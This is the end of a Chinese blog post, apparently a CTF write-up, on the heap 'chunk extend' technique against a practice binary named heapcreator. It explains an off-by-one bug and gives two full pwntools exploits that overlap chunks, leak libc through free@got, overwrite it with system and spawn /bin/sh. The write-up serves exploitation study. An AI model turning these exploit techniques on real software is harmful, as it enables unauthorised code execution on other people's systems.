<ol>
<li>创建堆，根据用户输入的长度，申请对应内存空间，并利用read 读取指定长度内容。这里长度没有进行检测，当长度为负数的时候，会出现任意长度堆溢出的漏洞。当前，前提是可以进行 malloc。此外，这里读取之后并没有设置 NULL。</li>
<li>编辑堆，根据指定的索引以及之前存储的堆的大小读取内容，但是这里读入的长度会比之前大 1，所以会存在 off by one 漏洞。</li>
<li>展示堆，输出指定索引堆的大小以及内容。</li>
<li>删除堆，删除指定堆，并且将对应指针设置为了NULL。</li>
</ol>
<h2 id="利用">利用<a class="post-anchor" href="#利用"></a></h2><p>基本利用思路如下</p>
<ol>
<li>利用 off by one 漏洞覆盖下一个chunk 的size 字段，从而构造伪造的chunk 大小。</li>
<li>申请伪造的chunk 大小，从而产生 chunk overlap，进而修改关键指针。</li>
</ol>
<p>exp</p>
<pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/env python</span>
<span class="hljs-comment"># -*- coding: utf-8 -*-</span>
<span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *
r = process(<span class="hljs-string">'./heapcreator'</span>)
heap = ELF(<span class="hljs-string">'./heapcreator'</span>)
libc = ELF(<span class="hljs-string">'./libc.so.6'</span>)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">create</span><span class="hljs-params">(size, content)</span>:</span>
    r.recvuntil(<span class="hljs-string">":"</span>)
    r.sendline(<span class="hljs-string">"1"</span>)
    r.recvuntil(<span class="hljs-string">":"</span>)
    r.sendline(str(size))
    r.recvuntil(<span class="hljs-string">":"</span>)
    r.sendline(content)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">edit</span><span class="hljs-params">(idx, content)</span>:</span>
    r.recvuntil(<span class="hljs-string">":"</span>)
    r.sendline(<span class="hljs-string">"2"</span>)
    r.recvuntil(<span class="hljs-string">":"</span>)
    r.sendline(str(idx))
    r.recvuntil(<span class="hljs-string">":"</span>)
    r.sendline(content)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">show</span><span class="hljs-params">(idx)</span>:</span>
    r.recvuntil(<span class="hljs-string">":"</span>)
    r.sendline(<span class="hljs-string">"3"</span>)
    r.recvuntil(<span class="hljs-string">":"</span>)
    r.sendline(str(idx))

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">delete</span><span class="hljs-params">(idx)</span>:</span>
    r.recvuntil(<span class="hljs-string">":"</span>)
    r.sendline(<span class="hljs-string">"4"</span>)
    r.recvuntil(<span class="hljs-string">":"</span>)
    r.sendline(str(idx))

free_got = <span class="hljs-number">0x602018</span>
create(<span class="hljs-number">0x18</span>, <span class="hljs-string">"dada"</span>)  <span class="hljs-comment"># 0</span>
create(<span class="hljs-number">0x10</span>, <span class="hljs-string">"ddaa"</span>)  <span class="hljs-comment"># 1</span>
<span class="hljs-comment"># overwrite heap 1's struct's size to 0x41</span>
edit(<span class="hljs-number">0</span>, <span class="hljs-string">"/bin/sh\x00"</span> + <span class="hljs-string">"a"</span> * <span class="hljs-number">0x10</span> + <span class="hljs-string">"\x41"</span>)
<span class="hljs-comment"># trigger heap 1's struct to fastbin 0x40</span>
<span class="hljs-comment"># heap 1's content to fastbin 0x20</span>
delete(<span class="hljs-number">1</span>)
<span class="hljs-comment"># new heap 1's struct will point to old heap 1's content, size 0x20</span>
<span class="hljs-comment"># new heap 1's content will point to old heap 1's struct, size 0x30</span>
<span class="hljs-comment"># that is to say we can overwrite new heap 1's struct</span>
<span class="hljs-comment"># here we overwrite its heap content pointer to free@got</span>
create(<span class="hljs-number">0x30</span>, p64(<span class="hljs-number">0</span>) * <span class="hljs-number">4</span> + p64(<span class="hljs-number">0x30</span>) + p64(heap.got[<span class="hljs-string">'free'</span>]))  <span class="hljs-comment">#1</span>
<span class="hljs-comment"># leak freeaddr</span>
show(<span class="hljs-number">1</span>)
r.recvuntil(<span class="hljs-string">"Content : "</span>)
data = r.recvuntil(<span class="hljs-string">"Done !"</span>)

free_addr = u64(data.split(<span class="hljs-string">"\n"</span>)[<span class="hljs-number">0</span>].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">"\x00"</span>))
libc_base = free_addr - libc.symbols[<span class="hljs-string">'free'</span>]
log.success(<span class="hljs-string">'libc base addr: '</span> + hex(libc_base))
system_addr = libc_base + libc.symbols[<span class="hljs-string">'system'</span>]
<span class="hljs-comment">#gdb.attach(r)</span>
<span class="hljs-comment"># overwrite free@got with system addr</span>
edit(<span class="hljs-number">1</span>, p64(system_addr))
<span class="hljs-comment"># trigger system("/bin/sh")</span>
delete(<span class="hljs-number">0</span>)
r.interactive()</code></pre>

<pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *
sh=process(<span class="hljs-string">'./heapcreator'</span>)
elf=ELF(<span class="hljs-string">'./heapcreator'</span>)
libc=ELF(<span class="hljs-string">'/lib/x86_64-linux-gnu/libc.so.6'</span>)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">create</span><span class="hljs-params">(size,value)</span>:</span>
    sh.recvuntil(<span class="hljs-string">'Your choice :'</span>)
    sh.sendline(<span class="hljs-string">'1'</span>)
    sh.recvuntil(<span class="hljs-string">'Size of Heap :'</span>)
    sh.sendline(str(size))
    sh.recvuntil(<span class="hljs-string">'Content of heap:'</span>)
    sh.sendline(value)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">edit</span><span class="hljs-params">(idx,value)</span>:</span>
    sh.recvuntil(<span class="hljs-string">'Your choice :'</span>)
    sh.sendline(<span class="hljs-string">'2'</span>)
    sh.recvuntil(<span class="hljs-string">'Index :'</span>)
    sh.sendline(str(idx))
    sh.recvuntil(<span class="hljs-string">'Content of heap : '</span>)
    sh.sendline(value)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">show</span><span class="hljs-params">(idx)</span>:</span>
    sh.recvuntil(<span class="hljs-string">'Your choice :'</span>)
    sh.sendline(<span class="hljs-string">'3'</span>)
    sh.recvuntil(<span class="hljs-string">'Index :'</span>)
    sh.sendline(str(idx))

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">delete</span><span class="hljs-params">(idx)</span>:</span>
    sh.recvuntil(<span class="hljs-string">'Your choice :'</span>)
    sh.sendline(<span class="hljs-string">'4'</span>)
    sh.recvuntil(<span class="hljs-string">'Index :'</span>)
    sh.sendline(str(idx))

free_got=elf.got[<span class="hljs-string">'free'</span>]
create(<span class="hljs-number">0x18</span>,<span class="hljs-string">'aaaaaaa'</span>)  <span class="hljs-comment">#idx0 实际分配了0x10的chunk，重用idx1的prev_size的8个字节</span>
create(<span class="hljs-number">0x10</span>,<span class="hljs-string">'aaaaaaa'</span>)　<span class="hljs-comment">#idx1　　</span>
create(<span class="hljs-number">0x10</span>,<span class="hljs-string">'aaaaaaa'</span>)　　<span class="hljs-comment">#idx2</span>
create(<span class="hljs-number">0x10</span>,<span class="hljs-string">'/bin/sh\x00'</span>)　　<span class="hljs-comment">#idx3</span>
payload=<span class="hljs-string">'a'</span>*<span class="hljs-number">0x18</span>+<span class="hljs-string">'\x81'</span>
edit(<span class="hljs-number">0</span>,payload)   <span class="hljs-comment">#修改idx1的size为0x81</span>
delete(<span class="hljs-number">1</span>)　　<span class="hljs-comment">#idx1进入0x70的unsorted bin</span>
size=<span class="hljs-string">'\x08'</span>.ljust(<span class="hljs-number">8</span>,<span class="hljs-string">'\x00'</span>)
payload=<span class="hljs-string">'b'</span>*<span class="hljs-number">0x40</span>+size+p64(free_got)
create(<span class="hljs-number">0x70</span>,payload)　　<span class="hljs-comment">#分配到idx1 此时size为0x70，可以堆溢出到idx2，修改idx2的内容指针为free_got</span>
show(<span class="hljs-number">2</span>)　　<span class="hljs-comment">#输出free真实地址,泄露libc基地址</span>
sh.recvuntil(<span class="hljs-string">'Content :'</span>)
free_adr=u64(sh.recvline().strip().ljust(<span class="hljs-number">8</span>,<span class="hljs-string">'\x00'</span>))

<span class="hljs-keyword">print</span> <span class="hljs-string">'free_adr: '</span>+hex(free_adr)
libc_base=free_adr-libc.symbols[<span class="hljs-string">'free'</span>]
system_adr=libc_base+libc.symbols[<span class="hljs-string">'system'</span>]
<span class="hljs-keyword">print</span> <span class="hljs-string">'libc_base: '</span>+hex(libc_base)
<span class="hljs-keyword">print</span> <span class="hljs-string">'system_adr: '</span>+hex(system_adr)
edit(<span class="hljs-number">2</span>,p64(system_adr)) <span class="hljs-comment">#将free_got改为system地址</span>
delete(<span class="hljs-number">3</span>)　　　　　　　　<span class="hljs-comment">#free(idx-&gt;content)触发</span>
sh.interactive()</code></pre>



  
    <div class="post-reward">
    <div id="reward-button">打赏</div>
      <div id="qr">
        <div class="wrap">
            
            <div class="bg-wrap">
              <a href="/images/zhifubao.png" target="_block" class="bg" style="background-image:url('/images/zhifubao.png')"></a>
              支付宝
            </div>
            
            
            <div class="bg-wrap">
                <a href="/images/weixin.png" target="_block" class="bg" style="background-image:url('/images/weixin.png')"></a>
              微信
            </div>
            
        </div>
      </div>
    </div>
  
  <div class="post-guide">
    <div class="item left">
        
          <a href="/2019/11/03/山东深思杯write-up/">山东深思杯write up</a>
        
    </div>
    <div class="item right">
        
          <a href="/2019/10/17/Geek-10th-write-up/">Geek 10th write up</a>
        
    </div>
  </div>

  

  <div class="post-copyright">
    <div class="auth">
      本文作者：<a href="http://pumpkin9.github.io">pumpkin9</a>
    </div>
    <div class="link">
      永久链接：<a href="http://pumpkin9.github.io/2019/10/21/chunk-extend/">http://pumpkin9.github.io/2019/10/21/chunk-extend/</a>
    </div>
    <div class="declare">
      版权声明：本文首发于<a href="http://pumpkin9.github.io">pumpkin9</a>的博客，转载请注明出处！
    </div>
  </div>

  <div id="comment"></div>

  
  
</article>
        <footer>
          <div class="copyright">
            ©2019
            <a href="http://pumpkin9.github.io">pumpkin9</a> Powered by <a href="https://hexo.io">Hexo</a> |
            <a href="https://github.com/shixiaohu2206/hexo-theme-huhu">hexo-theme-huhu</a>
          </div>
          
        </footer>
      </div>
    </div>
  <script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"/live2dw/assets/z16.model.json"},"display":{"superSample":2,"width":150,"height":300,"position":"right","hOffset":70,"vOffset":-20},"mobile":{"show":true,"scale":0.5},"react":{"opacityDefault":0.7,"opacityOnHover":0.2},"log":false});</script></body>
  
</html>
<script type="text/javascript">
                  window.HUHU_CONFIG = JSON.parse("{\"share\":[\"weibo\",\"weixin\",\"qqkongjian\",\"QQ\",\"douban\",\"facebook\",\"twitter\",\"google\"],\"valine\":{\"API_ID\":\"vVaPNFdcK9dSGbIzRRK8Lynz-gzGzoHsz\",\"API_KEY\":\"dPlqFhVLg4CTqpRKmq7I0cQw\"},\"service_worker\":{\"open\":false}}")
                </script> <script type="text/javascript">window.addEventListener('load', function() {
    
    window.loadJs = function(d, m, a) {
      var c = document.getElementsByTagName('head')[0] || document.head || document.documentElement
      var b = document.createElement('script')
      b.defer = true
      b.setAttribute('type', 'text/javascript')
      b.setAttribute('charset', 'UTF-8')
      b.setAttribute('async', 'true')
      b.setAttribute('src', d)
      m && b.setAttribute('data-main', '/scripts/app-built')
      if (typeof a === 'function') {
        if (window.attachEvent) {
          b.onreadystatechange = function() {
            var e = b.readyState
            if (e === 'loaded' || e === 'complete') {
              b.onreadystatechange = null
              a()
            }
          }
        } else {
          b.onload = a
        }
      }
      c.appendChild(b)
    }
    window.loadJs && window.loadJs('https://cdn.bootcss.com/require.js/2.3.6/require.min.js', true, function() {require.config({"paths":{"util":"util","share":"share","search":"search","registerSW":"registerSW","valine":"cdn/Valine.min","av":["https://cdn.jsdelivr.net/npm/leancloud-storage/dist/av-min"],"pjax":["https://cdn.bootcss.com/jquery.pjax/2.0.1/jquery.pjax.min"],"jquery":["https://cdn.bootcss.com/jquery/3.4.1/jquery.min"],"confirm":["https://cdn.bootcss.com/jquery-confirm/3.3.4/jquery-confirm.min"],"fancybox":["https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min"],"chart":["https://cdn.bootcss.com/Chart.js/2.8.0-rc.1/Chart.bundle.min"]},"map":{"*":{"css":"https://cdn.bootcss.com/require-css/0.1.10/css.min.js"}},"shim":{"fancybox":{"deps":["css!https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min.css"]},"confirm":{"deps":["css!https://cdn.bootcss.com/jquery-confirm/3.3.4/jquery-confirm.min.css"]},"chart":{"deps":["css!https://cdn.bootcss.com/Chart.js/2.8.0-rc.1/Chart.min.css"]}},"waitSeconds":3})})
  })</script> <script type="text/javascript">
                  ;(function() {
                    var bp = document.createElement('script')
                    var curProtocol = window.location.protocol.split(':')[0]
                    if (curProtocol === 'https') {
                      bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'
                    } else {
                      bp.src = 'http://push.zhanzhang.baidu.com/push.js'
                    }
                    var s = document.getElementsByTagName('script')[0]
                    s.parentNode.insertBefore(bp, s)
                  })()
                </script> 
